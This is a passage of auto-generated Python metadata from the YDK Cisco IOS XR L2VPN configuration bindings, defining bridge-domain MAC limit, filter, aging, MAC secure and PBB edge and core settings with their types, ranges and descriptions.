_MetaInfoClassMember('bd-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' Mac Address Limit Notification
''',
'bd_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters.BdMacFilter' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters.BdMacFilter',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('drop', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' MAC address for filtering
''',
'drop',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-mac-filter',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters',
False,
[
_MetaInfoClassMember('bd-mac-filter', REFERENCE_LIST, 'BdMacFilter' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters.BdMacFilter',
[], [],
''' Static MAC address
''',
'bd_mac_filter',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-mac-filters',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.MacSecure' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.MacSecure',
False,
[
_MetaInfoClassMember('action', REFERENCE_ENUM_CLASS, 'MacSecureActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacSecureActionEnum',
[], [],
''' MAC secure enforcement action
''',
'action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MAC Secure
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' MAC Secure Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mac-secure',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacAging',
False,
[
_MetaInfoClassMember('bd-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' Mac Aging Time
''',
'bd_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'bd_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac',
False,
[
_MetaInfoClassMember('bd-mac-aging', REFERENCE_CLASS, 'BdMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'bd_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-filters', REFERENCE_CLASS, 'BdMacFilters' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters',
[], [],
''' Filter Mac Address
''',
'bd_mac_filters',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-learn', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable Mac Learning
''',
'bd_mac_learn',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-limit', REFERENCE_CLASS, 'BdMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'bd_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-port-down-flush', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable MAC Flush when Port goes Down
''',
'bd_mac_port_down_flush',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-withdraw', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Mac Withdraw
''',
'bd_mac_withdraw',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-withdraw-access-pw-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' MAC withdraw on Access PW
''',
'bd_mac_withdraw_access_pw_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-withdraw-behavior', REFERENCE_ENUM_CLASS, 'MacWithdrawBehaviorEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacWithdrawBehaviorEnum',
[], [],
''' MAC withdraw sent on bridge port down
''',
'bd_mac_withdraw_behavior',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-withdraw-relay', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Mac withdraw sent from access PW to access
PW
''',
'bd_mac_withdraw_relay',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mac-secure', REFERENCE_CLASS, 'MacSecure' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.MacSecure',
[], [],
''' MAC Secure
''',
'mac_secure',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.NvSatellite' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.NvSatellite',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable nV Satellite Settings
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('offload-ipv4-multicast-enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IPv4 Multicast Offload to Satellite
Nodes
''',
'offload_ipv4_multicast_enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'nv-satellite',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings.PbbStaticMacMapping' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings.PbbStaticMacMapping',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bmac', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Backbone MAC address
''',
'bmac',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-static-mac-mapping',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings',
False,
[
_MetaInfoClassMember('pbb-static-mac-mapping', REFERENCE_LIST, 'PbbStaticMacMapping' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings.PbbStaticMacMapping',
[], [],
''' PBB Static Mac Address Mapping
Configuration
''',
'pbb_static_mac_mapping',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-static-mac-mappings',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeDhcpProfile' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeDhcpProfile',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-dhcp-profile',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacLimit',
False,
[
_MetaInfoClassMember('pbb-edge-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' MAC address limit enforcement action
''',
'pbb_edge_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses after which
MAC limit action is taken
''',
'pbb_edge_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' MAC address limit notification action
''',
'pbb_edge_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacAging',
False,
[
_MetaInfoClassMember('pbb-edge-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' Mac Aging Time
''',
'pbb_edge_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'pbb_edge_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacSecure' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacSecure',
False,
[
_MetaInfoClassMember('accept-shutdown', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Accept Virtual instance port to be
shutdown on mac violation
''',
'accept_shutdown',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('action', REFERENCE_ENUM_CLASS, 'MacSecureActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacSecureActionEnum',
[], [],
''' MAC secure enforcement action
''',
'action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Virtual instance port MAC
Secure
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MAC Secure
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' MAC Secure Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-mac-secure',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac',
False,
[
_MetaInfoClassMember('pbb-edge-mac-aging', REFERENCE_CLASS, 'PbbEdgeMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'pbb_edge_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-learning', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable Mac Learning
''',
'pbb_edge_mac_learning',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-limit', REFERENCE_CLASS, 'PbbEdgeMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'pbb_edge_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-secure', REFERENCE_CLASS, 'PbbEdgeMacSecure' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacSecure',
[], [],
''' MAC Secure
''',
'pbb_edge_mac_secure',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge',
False,
[
_MetaInfoClassMember('core-bd-name', ATTRIBUTE, 'str' , None, None,
[(0, 27)], [],
''' Core BD Name
''',
'core_bd_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('isid', ATTRIBUTE, 'int' , None, None,
[('256', '16777214')], [],
''' ISID
''',
'isid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pbb-edge-dhcp-profile', REFERENCE_CLASS, 'PbbEdgeDhcpProfile' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeDhcpProfile',
[], [],
''' Attach a DHCP profile
''',
'pbb_edge_dhcp_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-igmp-profile', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
'pbb_edge_igmp_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac', REFERENCE_CLASS, 'PbbEdgeMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac',
[], [],
''' MAC configuration commands
''',
'pbb_edge_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-static-mac-mappings', REFERENCE_CLASS, 'PbbStaticMacMappings' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings',
[], [],
''' PBB Static Mac Address Mapping Table
''',
'pbb_static_mac_mappings',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('unknown-unicast-bmac', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Configure Unknown Unicast BMAC address
for PBB Edge Port
''',
'unknown_unicast_bmac',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges',
False,
[
_MetaInfoClassMember('pbb-edge', REFERENCE_LIST, 'PbbEdge' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge',
[], [],
''' Configure BD as PBB Edge with ISID and
associated PBB Core BD
''',
'pbb_edge',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edges',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacAging',
False,
[
_MetaInfoClassMember('pbb-core-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' Mac Aging Time
''',
'pbb_core_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'pbb_core_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacLimit',
False,
[
_MetaInfoClassMember('pbb-core-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' MAC address limit enforcement action
''',
'pbb_core_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses after which MAC
limit action is taken
''',
'pbb_core_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' MAC address limit notification action
''',
'pbb_core_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac',
False,
[
_MetaInfoClassMember('pbb-core-mac-aging', REFERENCE_CLASS, 'PbbCoreMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'pbb_core_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-learning', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable Mac Learning
''',
'pbb_core_mac_learning',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-limit', REFERENCE_CLASS, 'PbbCoreMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'pbb_core_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis.PbbCoreEvi' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis.PbbCoreEvi',
False,
[
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-evi',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis' : {
